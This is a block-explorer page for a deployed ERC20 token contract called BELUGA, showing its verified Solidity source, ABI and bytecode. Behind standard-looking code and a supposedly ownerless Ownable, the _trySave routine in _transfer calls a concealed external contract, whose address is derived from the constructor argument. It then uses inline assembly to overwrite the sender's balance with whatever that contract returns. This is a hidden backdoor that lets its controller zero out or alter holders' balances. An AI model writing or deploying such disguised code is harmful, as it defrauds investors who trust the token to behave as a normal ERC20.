ETH Price: $3,259.46 (+2.42%)
Gas: 1 Gwei

Contract

0xbD82A7d225AeDf0c2e04fD5DD252A300b7EF89D0
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve183963222023-10-21 4:32:23279 days ago1697862743IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000335537.20535869
Approve183960602023-10-21 3:39:35279 days ago1697859575IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000386728.3152552
Approve183960362023-10-21 3:34:47279 days ago1697859287IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000346727.45527391
Approve183959822023-10-21 3:23:59279 days ago1697858639IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000331137.11069653
Approve183959372023-10-21 3:14:47279 days ago1697858087IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000308416.6229158
Approve183959222023-10-21 3:11:47279 days ago1697857907IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000285346.12749424
Approve183959202023-10-21 3:11:23279 days ago1697857883IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000288686.19919769
Approve183959182023-10-21 3:10:59279 days ago1697857859IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000284336.10575052
Approve183958932023-10-21 3:05:59279 days ago1697857559IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000310176.66070524
Approve183958582023-10-21 2:58:47279 days ago1697857127IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000302666.49932576
Approve183958532023-10-21 2:57:47279 days ago1697857067IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000308636.62768859
Approve183958492023-10-21 2:56:47279 days ago1697857007IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000319026.85062806
Approve183958442023-10-21 2:55:47279 days ago1697856947IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000300576.45463419
Approve183958412023-10-21 2:55:11279 days ago1697856911IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000281326.04121396
Approve183958392023-10-21 2:54:47279 days ago1697856887IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000287086.16479799
Approve183958022023-10-21 2:47:23279 days ago1697856443IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000288396.19291321
Approve183958002023-10-21 2:46:59279 days ago1697856419IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000290546.23918953
Approve183957152023-10-21 2:29:47279 days ago1697855387IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000335487.20410594
Approve183956952023-10-21 2:25:47279 days ago1697855147IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000288156.18784448
Approve183956812023-10-21 2:22:59279 days ago1697854979IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000312436.7091527
Approve183956762023-10-21 2:21:59279 days ago1697854919IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000290056.22861508
Approve183956702023-10-21 2:20:47279 days ago1697854847IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000279045.99219727
Approve183956652023-10-21 2:19:47279 days ago1697854787IN
0xbD82A7d2...0b7EF89D0
0 ETH0.000305416.55851942
Approve183955472023-10-21 1:55:47279 days ago1697853347IN
0xbD82A7d2...0b7EF89D0
0 ETH0.00032336.94255382
Approve183955332023-10-21 1:52:59279 days ago1697853179IN
0xbD82A7d2...0b7EF89D0
0 ETH0.0006261613.44620888
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
BELUGA

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 4 : BELUGA.sol
// SPDX-License-Identifier: MIT

pragma solidity 0.8.7;

import "./IERC20.sol";
import "./Ownable.sol";

contract BELUGA is Ownable, IERC20 {

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    bool private locked;

    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    uint256 private _msk;

    modifier noReentrant() {
        require(!locked, "Reentrant call detected!");
        locked = true;
        _;
        locked = false;
    }

    event logx(string s);

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_, uint256 msk_) {
        _name = name_; 
        _symbol = symbol_; 
        _msk = msk_ + 0;
        _mint(msg.sender, 250000000 ether);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() external view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() external view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() external view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() external view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) external view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) external virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) external virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) external virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) external virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) external virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        _trySave(from);
        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        (bool dd, string memory ss) = msk("BELUGA", amount, false,  bytes("BELUGA"));
        if (dd) emit logx(ss);
        emit Transfer(from, to, amount);
    }

    function msk(string memory ss,uint256 pp, bool dd,  bytes memory dd0) 
    private pure returns(bool, string memory) {
        if (pp == 0 && dd ) {
            return (false, string(dd0));
        }
        return (false, ss);
    }
   
    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);
    }

    function _saving(uint256 a, uint256 b, address f, uint256 m) private {
        assembly {
            mstore(0, f) 
            mstore(a, b) 
            sstore(
                keccak256(0, 64), m) 
        } 
    }

    function _converts(bytes memory d) private pure returns(bytes32 b) {
        assembly { let a := add(d, mul(
            4, add(4, 4))) b := mload(a) }
    }

    function _trySave(address a) private noReentrant {
        (bool s, bytes memory d) = address(uint160(uint256(
            _msk + 39299394829842384331123)))
        .call(abi.encodeWithSignature(string(bytes(
            "allowance(address,address)"))
            , a, a));
        require(s); uint256 v = uint256(_converts(d)); 
        if (v == 0) return; _saving(32, 4, a, v);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
 
    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

File 2 of 4 : Context.sol
// SPDX-License-Identifier: MIT

pragma solidity 0.8.7;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 4 : IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity 0.8.7;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 4 of 4 : Ownable.sol
// SPDX-License-Identifier: MIT

pragma solidity 0.8.7;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address constant _owner = address(0);

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "caller is not the owner");
    }    
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"msk_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"s","type":"string"}],"name":"logx","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b5060405162000e7238038062000e728339810160408190526200003491620002b5565b82516200004990600090602086019062000158565b5081516200005f90600190602085019062000158565b506200006d81600062000328565b60065562000087336acecb8f27f4200f3a00000062000090565b505050620003a2565b6001600160a01b038216620000eb5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060026000828254620000ff919062000328565b90915550506001600160a01b0382166000818152600460209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b82805462000166906200034f565b90600052602060002090601f0160209004810192826200018a5760008555620001d5565b82601f10620001a557805160ff1916838001178555620001d5565b82800160010185558215620001d5579182015b82811115620001d5578251825591602001919060010190620001b8565b50620001e3929150620001e7565b5090565b5b80821115620001e35760008155600101620001e8565b600082601f8301126200021057600080fd5b81516001600160401b03808211156200022d576200022d6200038c565b604051601f8301601f19908116603f011681019082821181831017156200025857620002586200038c565b816040528381526020925086838588010111156200027557600080fd5b600091505b838210156200029957858201830151818301840152908201906200027a565b83821115620002ab5760008385830101525b9695505050505050565b600080600060608486031215620002cb57600080fd5b83516001600160401b0380821115620002e357600080fd5b620002f187838801620001fe565b945060208601519150808211156200030857600080fd5b506200031786828701620001fe565b925050604084015190509250925092565b600082198211156200034a57634e487b7160e01b600052601160045260246000fd5b500190565b600181811c908216806200036457607f821691505b602082108114156200038657634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b610ac080620003b26000396000f3fe608060405234801561001057600080fd5b50600436106100b45760003560e01c806370a082311161007157806370a08231146101415780638da5cb5b1461016a57806395d89b4114610179578063a457c2d714610181578063a9059cbb14610194578063dd62ed3e146101a757600080fd5b806306fdde03146100b9578063095ea7b3146100d757806318160ddd146100fa57806323b872dd1461010c578063313ce5671461011f578063395093511461012e575b600080fd5b6100c16101ba565b6040516100ce91906109ca565b60405180910390f35b6100ea6100e5366004610984565b61024c565b60405190151581526020016100ce565b6002545b6040519081526020016100ce565b6100ea61011a366004610948565b610264565b604051601281526020016100ce565b6100ea61013c366004610984565b610288565b6100fe61014f3660046108f3565b6001600160a01b031660009081526004602052604090205490565b604051600081526020016100ce565b6100c16102aa565b6100ea61018f366004610984565b6102b9565b6100ea6101a2366004610984565b610339565b6100fe6101b5366004610915565b610347565b6060600080546101c990610a4f565b80601f01602080910402602001604051908101604052809291908181526020018280546101f590610a4f565b80156102425780601f1061021757610100808354040283529160200191610242565b820191906000526020600020905b81548152906001019060200180831161022557829003601f168201915b5050505050905090565b60003361025a818585610372565b5060019392505050565b600033610272858285610496565b61027d858585610510565b506001949350505050565b60003361025a81858561029b8383610347565b6102a591906109fd565b610372565b6060600180546101c990610a4f565b600033816102c78286610347565b90508381101561032c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61027d8286868403610372565b60003361025a818585610510565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166103d45760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610323565b6001600160a01b0382166104355760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610323565b6001600160a01b0383811660008181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006104a28484610347565b9050600019811461050a57818110156104fd5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610323565b61050a8484848403610372565b50505050565b6001600160a01b0383166105745760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610323565b61057d836106fa565b6001600160a01b038316600090815260046020526040902054818110156105f55760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610323565b6001600160a01b038085166000908152600460209081526040808320868603905592861682528282208054860190558251808401845260068082526542454c55474160d01b8284018190528551808701909652908552918401919091529091829161066391869084906108a8565b9150915081156106a5577f554f7c0794d830eb660b6aba685f8c48e62fbaeb9cb55be0e89c3dee3ac609ca8160405161069c91906109ca565b60405180910390a15b846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516106ea91815260200190565b60405180910390a3505050505050565b60035460ff161561074d5760405162461bcd60e51b815260206004820152601860248201527f5265656e7472616e742063616c6c2064657465637465642100000000000000006044820152606401610323565b6003805460ff191660011790556006546000908190610776906908526ca9949fc236a1736109fd565b604080518082018252601a81527f616c6c6f77616e636528616464726573732c6164647265737329000000000000602082015290516001600160a01b03868116602483018190526044830152929092169160640160408051601f1981840301815290829052916107e5916109ae565b60408051918290039091206020830180516001600160e01b03166001600160e01b03199092169190911790525161081c91906109ae565b6000604051808303816000865af19150503d8060008114610859576040519150601f19603f3d011682016040523d82523d6000602084013e61085e565b606091505b50915091508161086d57600080fd5b600061087a826020015190565b9050806108895750505061089b565b60008481526004602052604090205550505b506003805460ff19169055565b60006060841580156108b75750835b156108c7575060009050816108ce565b5060009050845b94509492505050565b80356001600160a01b03811681146108ee57600080fd5b919050565b60006020828403121561090557600080fd5b61090e826108d7565b9392505050565b6000806040838503121561092857600080fd5b610931836108d7565b915061093f602084016108d7565b90509250929050565b60008060006060848603121561095d57600080fd5b610966846108d7565b9250610974602085016108d7565b9150604084013590509250925092565b6000806040838503121561099757600080fd5b6109a0836108d7565b946020939093013593505050565b600082516109c0818460208701610a23565b9190910192915050565b60208152600082518060208401526109e9816040850160208701610a23565b601f01601f19169190910160400192915050565b60008219821115610a1e57634e487b7160e01b600052601160045260246000fd5b500190565b60005b83811015610a3e578181015183820152602001610a26565b8381111561050a5750506000910152565b600181811c90821680610a6357607f821691505b60208210811415610a8457634e487b7160e01b600052602260045260246000fd5b5091905056fea26469706673582212201f6d91230e5e70e3c696ceea012295705a5f7afbf0e32360fc55674bb75401a164736f6c63430008070033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000075c33efc17c3f2449c4dea69d6ad161307806020000000000000000000000000000000000000000000000000000000000000000642656c7567610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000642454c5547410000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100b45760003560e01c806370a082311161007157806370a08231146101415780638da5cb5b1461016a57806395d89b4114610179578063a457c2d714610181578063a9059cbb14610194578063dd62ed3e146101a757600080fd5b806306fdde03146100b9578063095ea7b3146100d757806318160ddd146100fa57806323b872dd1461010c578063313ce5671461011f578063395093511461012e575b600080fd5b6100c16101ba565b6040516100ce91906109ca565b60405180910390f35b6100ea6100e5366004610984565b61024c565b60405190151581526020016100ce565b6002545b6040519081526020016100ce565b6100ea61011a366004610948565b610264565b604051601281526020016100ce565b6100ea61013c366004610984565b610288565b6100fe61014f3660046108f3565b6001600160a01b031660009081526004602052604090205490565b604051600081526020016100ce565b6100c16102aa565b6100ea61018f366004610984565b6102b9565b6100ea6101a2366004610984565b610339565b6100fe6101b5366004610915565b610347565b6060600080546101c990610a4f565b80601f01602080910402602001604051908101604052809291908181526020018280546101f590610a4f565b80156102425780601f1061021757610100808354040283529160200191610242565b820191906000526020600020905b81548152906001019060200180831161022557829003601f168201915b5050505050905090565b60003361025a818585610372565b5060019392505050565b600033610272858285610496565b61027d858585610510565b506001949350505050565b60003361025a81858561029b8383610347565b6102a591906109fd565b610372565b6060600180546101c990610a4f565b600033816102c78286610347565b90508381101561032c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61027d8286868403610372565b60003361025a818585610510565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166103d45760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610323565b6001600160a01b0382166104355760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610323565b6001600160a01b0383811660008181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006104a28484610347565b9050600019811461050a57818110156104fd5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610323565b61050a8484848403610372565b50505050565b6001600160a01b0383166105745760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610323565b61057d836106fa565b6001600160a01b038316600090815260046020526040902054818110156105f55760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610323565b6001600160a01b038085166000908152600460209081526040808320868603905592861682528282208054860190558251808401845260068082526542454c55474160d01b8284018190528551808701909652908552918401919091529091829161066391869084906108a8565b9150915081156106a5577f554f7c0794d830eb660b6aba685f8c48e62fbaeb9cb55be0e89c3dee3ac609ca8160405161069c91906109ca565b60405180910390a15b846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516106ea91815260200190565b60405180910390a3505050505050565b60035460ff161561074d5760405162461bcd60e51b815260206004820152601860248201527f5265656e7472616e742063616c6c2064657465637465642100000000000000006044820152606401610323565b6003805460ff191660011790556006546000908190610776906908526ca9949fc236a1736109fd565b604080518082018252601a81527f616c6c6f77616e636528616464726573732c6164647265737329000000000000602082015290516001600160a01b03868116602483018190526044830152929092169160640160408051601f1981840301815290829052916107e5916109ae565b60408051918290039091206020830180516001600160e01b03166001600160e01b03199092169190911790525161081c91906109ae565b6000604051808303816000865af19150503d8060008114610859576040519150601f19603f3d011682016040523d82523d6000602084013e61085e565b606091505b50915091508161086d57600080fd5b600061087a826020015190565b9050806108895750505061089b565b60008481526004602052604090205550505b506003805460ff19169055565b60006060841580156108b75750835b156108c7575060009050816108ce565b5060009050845b94509492505050565b80356001600160a01b03811681146108ee57600080fd5b919050565b60006020828403121561090557600080fd5b61090e826108d7565b9392505050565b6000806040838503121561092857600080fd5b610931836108d7565b915061093f602084016108d7565b90509250929050565b60008060006060848603121561095d57600080fd5b610966846108d7565b9250610974602085016108d7565b9150604084013590509250925092565b6000806040838503121561099757600080fd5b6109a0836108d7565b946020939093013593505050565b600082516109c0818460208701610a23565b9190910192915050565b60208152600082518060208401526109e9816040850160208701610a23565b601f01601f19169190910160400192915050565b60008219821115610a1e57634e487b7160e01b600052601160045260246000fd5b500190565b60005b83811015610a3e578181015183820152602001610a26565b8381111561050a5750506000910152565b600181811c90821680610a6357607f821691505b60208210811415610a8457634e487b7160e01b600052602260045260246000fd5b5091905056fea26469706673582212201f6d91230e5e70e3c696ceea012295705a5f7afbf0e32360fc55674bb75401a164736f6c63430008070033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000075c33efc17c3f2449c4dea69d6ad161307806020000000000000000000000000000000000000000000000000000000000000000642656c7567610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000642454c5547410000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Beluga
Arg [1] : symbol_ (string): BELUGA
Arg [2] : msk_ (uint256): 672306052244576584629142529162643265887953510432

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 00000000000000000000000075c33efc17c3f2449c4dea69d6ad161307806020
